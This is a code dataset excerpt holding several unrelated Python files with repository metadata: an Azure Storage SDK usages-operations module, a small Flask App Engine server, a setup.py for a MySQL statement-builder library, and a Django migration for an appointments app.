] | 2,728 | 2015-01-09T10:19:32.000Z | 2022-03-31T14:50:33.000Z | sdk/storage/azure-mgmt-storage/azure/mgmt/storage/v2021_02_01/operations/_usages_operations.py | rsdoherty/azure-sdk-for-python | 6bba5326677468e6660845a703686327178bb7b1 | [
"MIT"
] | 17,773 | 2015-01-05T15:57:17.000Z | 2022-03-31T23:50:25.000Z | sdk/storage/azure-mgmt-storage/azure/mgmt/storage/v2021_02_01/operations/_usages_operations.py | rsdoherty/azure-sdk-for-python | 6bba5326677468e6660845a703686327178bb7b1 | [
"MIT"
] | 1,916 | 2015-01-19T05:05:41.000Z | 2022-03-31T19:36:44.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class UsagesOperations(object):
    """UsagesOperations operations.

    You should not instantiate this class directly. Instead, you should create a Client instance that
    instantiates it for you and attaches it as an attribute.

    :ivar models: Alias to model classes used in this operation group.
    :type models: ~azure.mgmt.storage.v2021_02_01.models
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """

    models = _models

    def __init__(self, client, config, serializer, deserializer):
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config

    def list_by_location(
        self,
        location,  # type: str
        **kwargs  # type: Any
    ):
        # type: (...) -> Iterable["_models.UsageListResult"]
        """Gets the current usage count and the limit for the resources of the location under the
        subscription.

        :param location: The location of the Azure Storage resource.
        :type location: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either UsageListResult or the result of cls(response)
        :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.storage.v2021_02_01.models.UsageListResult]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.UsageListResult"]
        # Map auth/not-found/conflict status codes to typed exceptions; callers
        # may override or extend via the 'error_map' kwarg.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2021-02-01"
        accept = "application/json"

        def prepare_request(next_link=None):
            # Build the HTTP request: the first page is built from the URL
            # template and query parameters; continuation pages reuse the
            # server-provided next_link verbatim.
            header_parameters = {}  # type: Dict[str, Any]
            header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

            if not next_link:
                # Construct URL
                url = self.list_by_location.metadata['url']  # type: ignore
                path_format_arguments = {
                    'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
                    'location': self._serialize.url("location", location, 'str'),
                }
                url = self._client.format_url(url, **path_format_arguments)
                # Construct parameters
                query_parameters = {}  # type: Dict[str, Any]
                query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

                request = self._client.get(url, query_parameters, header_parameters)
            else:
                url = next_link
                query_parameters = {}  # type: Dict[str, Any]
                request = self._client.get(url, query_parameters, header_parameters)
            return request

        def extract_data(pipeline_response):
            # Deserialize one page into (continuation token, item iterator).
            # NOTE(review): the continuation token is always None here, which
            # appears to limit paging to a single page -- confirm against
            # azure.core ItemPaged semantics for this (generated) operation.
            deserialized = self._deserialize('UsageListResult', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return None, iter(list_of_elem)

        def get_next(next_link=None):
            # Send one page request and fail fast on any non-200 response.
            request = prepare_request(next_link)

            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response

            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)

            return pipeline_response

        return ItemPaged(
            get_next, extract_data
        )
    list_by_location.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Storage/locations/{location}/usages'}  # type: ignore
b4d6f91b8ed6c6dec41247d122d8ad6cf4c7e2f0 | 1,018 | py | Python | rdr_server/server.py | robabram/raw-data-repository-v2 | a8e1a387d9ea3e4be3ec44473d026e3218f23509 | [
"BSD-3-Clause"
] | null | null | null | rdr_server/server.py | robabram/raw-data-repository-v2 | a8e1a387d9ea3e4be3ec44473d026e3218f23509 | [
"BSD-3-Clause"
] | 2 | 2021-02-08T20:31:00.000Z | 2021-04-30T20:44:44.000Z | rdr_server/server.py | robabram/raw-data-repository-v2 | a8e1a387d9ea3e4be3ec44473d026e3218f23509 | [
"BSD-3-Clause"
] | null | null | null | #
# This file is subject to the terms and conditions defined in the
# file 'LICENSE', which is part of this source code package.
#
# TODO: Drop flask_restplus and switch to flask views
# TODO: http://flask.pocoo.org/docs/1.0/views/
# TODO: documentation https://dev.to/djiit/documenting-your-flask-powered-api-like-a-boss-9eo
from flask import Flask
from flask_restplus import Api, Resource
# import api namespaces
from rdr_server.api.hello_world import api as ns1
from rdr_server.api.internal import api as ns2
from rdr_server.api.calendar import api as ns3
# If `entrypoint` is not defined in app.yaml, App Engine will look for an app
# called `app` in `main.py`.
app = Flask(__name__)
# Disable flask_restplus's automatic "did you mean ..." help text appended
# to 404 error messages.
app.config['ERROR_404_HELP'] = False
api = Api(app, version='0.1', title='A good test', description='A simple API test')
# Register the API namespaces imported above.
api.add_namespace(ns1)
api.add_namespace(ns2)
api.add_namespace(ns3)
@api.route('/_ah/warmup')
class HelloWorld(Resource):
    """Handler for App Engine warmup requests (GET /_ah/warmup)."""

    def get(self):
        # NOTE(review): this returns a JSON-formatted *string*, which
        # flask_restplus will serialize as one quoted string rather than an
        # object -- confirm whether a dict like {"success": "true"} was
        # intended.
        return '{ "success": "true" }'
3f2f85ab693d1673daa1a21bfca490bcb657bfc7 | 1,036 | py | Python | setup.py | lovette/mysqlstmt | ef7fa56ee45046018d6a6cd2c64abce19a8b33a8 | [
"BSD-3-Clause"
] | null | null | null | setup.py | lovette/mysqlstmt | ef7fa56ee45046018d6a6cd2c64abce19a8b33a8 | [
"BSD-3-Clause"
] | null | null | null | setup.py | lovette/mysqlstmt | ef7fa56ee45046018d6a6cd2c64abce19a8b33a8 | [
"BSD-3-Clause"
] | null | null | null | from setuptools import setup
# Read the Markdown README up front (with an explicit encoding and a context
# manager so the file handle is closed) instead of an unclosed inline open().
with open('README.md', encoding='utf-8') as readme_file:
    long_description = readme_file.read()

# Package metadata for mysqlstmt. Fixes: declare the long description as
# Markdown so PyPI renders README.md correctly instead of as plain text.
setup(
    name='mysqlstmt',
    version='1.0.1',
    url='https://github.com/lovette/mysqlstmt',
    download_url='https://github.com/lovette/mysqlstmt/archive/master.tar.gz',
    license='BSD',
    author='Lance Lovette',
    author_email='lance.lovette@gmail.com',
    description='Python library to build SQL statements for MySQL.',
    long_description=long_description,
    long_description_content_type='text/markdown',
    packages=['mysqlstmt'],
    install_requires=[],
    tests_require=['nose'],
    zip_safe=False,
    platforms='any',
    classifiers=[
        'Development Status :: 5 - Production/Stable',
        'Environment :: Web Environment',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: BSD License',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.7',
        'Topic :: Database',
        'Topic :: Software Development :: Libraries :: Python Modules'
    ]
)
96f5d2e26dd0359d3bad312da33bd8382a596b3f | 1,644 | py | Python | rooms/migrations/0003_auto_20200324_1450.py | covid-videoplattform/django-webfrontend | 63cd880d155bcf6549b5616be3c6d2a87d198106 | [
"MIT"
] | 1 | 2020-03-29T21:17:37.000Z | 2020-03-29T21:17:37.000Z | rooms/migrations/0003_auto_20200324_1450.py | covid-videoplattform/django-webfrontend | 63cd880d155bcf6549b5616be3c6d2a87d198106 | [
"MIT"
] | 15 | 2020-03-25T10:14:38.000Z | 2020-04-05T11:08:00.000Z | rooms/migrations/0003_auto_20200324_1450.py | covid-videoplattform/django-webfrontend | 63cd880d155bcf6549b5616be3c6d2a87d198106 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.4 on 2020-03-24 14:50
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('rooms', '0002_auto_20200324_1142'),
]
operations = [
migrations.AddField(
model_name='appointment',
name='last_modified',
field=models.DateTimeField(auto_now=True),
),
migrations.AlterField(
model_name='appointment',
name='description',
field=models.TextField(blank=True, max_length=255, null=True),
),
migrations.AlterField(
model_name='appointment',
name='end_time',
field=models.DateTimeField(blank=True, null=True, verbose_name='end of appointment'),
),
migrations.AlterField(
model_name='appointment',
name='room_name',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AlterField(
model_name='appointment',
name='staffmember',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='rooms.StaffMember'),
),
migrations.AlterField(
model_name='appointment',
name='start_time',
field=models.DateTimeField(blank=True, null=True, verbose_name='start of appointment'),
),
migrations.AlterField(
model_name='staffmember',
name='email',
field=models.CharField(blank=True, max_length=255, null=True),
),
]
| 32.88 | 129 | 0.596107 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.